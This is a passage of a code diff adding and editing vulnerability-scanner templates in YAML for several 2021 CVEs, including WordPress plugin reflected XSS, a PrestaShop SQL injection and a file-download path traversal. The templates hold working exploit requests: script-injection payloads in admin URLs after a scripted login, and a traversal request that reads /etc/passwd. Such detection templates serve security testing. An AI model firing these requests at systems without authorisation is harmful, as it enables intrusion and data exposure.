+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/options-general.php/</script><script>alert(document.domain)</script>/?page=skatubazar_option HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"

cves/2021/CVE-2021-37538.yaml

@@ -4,8 +4,9 @@ info:
   name: PrestaShop SmartBlog SQL Injection
   author: whoever
   severity: critical
-  description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality.
+  description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.
   tags: cve,cve2021,prestashop,smartblog,sqli
+  remediation: Apply the fix.
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538
     - https://blog.sorcery.ie/posts/smartblog_sqli/
@@ -30,3 +31,5 @@ requests:
         words:
           - "c5fe25896e49ddfe996db7508cf00534"
         part: body
+
+# Enhanced by mp on 2022/02/08

cves/2021/CVE-2021-38314.yaml

@@ -13,7 +13,7 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.30
     cve-id: CVE-2021-38314
-  description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
+  description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site's `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
 
 requests:
   - raw:

cves/2021/CVE-2021-39322.yaml

@@ -0,0 +1,48 @@
+id: CVE-2021-39322
+
+info:
+  name: Easy Social Icons < 3.0.9 - Reflected Cross-Site Scripting
+  author: dhiyaneshDK
+  severity: medium
+  description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path.
+  reference:
+    - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-39322
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2021-39322
+    cwe-id: CWE-79
+  tags: wordpress,cve,cve2021,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '</script><script>alert(document.domain)</script>'
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"

cves/2021/CVE-2021-39350.yaml

@@ -0,0 +1,48 @@
+id: CVE-2021-39350
+
+info:
+  name: FV Flowplayer Video Player WordPress plugin  - Authenticated Reflected XSS
+  author: gy741
+  severity: medium
+  description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts, in versions 7.5.0.727 - 7.5.2.727.
+  reference:
+    - https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-39350
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2021-39350
+    cwe-id: CWE-79
+  tags: cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-39433.yaml

@@ -0,0 +1,30 @@
+id: CVE-2021-39433
+
+info:
+  name: BIQS IT Biqs-drive v1.83 LFI
+  author: Veshraj
+  severity: high
+  description: A local file inclusion (LFI) vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.
+  reference:
+    - https://github.com/PinkDraconian/CVE-2021-39433/blob/main/README.md
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39433
+  tags: lfi,biqsdrive,cve,cve2021
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.50
+    cve-id: CVE-2021-39433
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200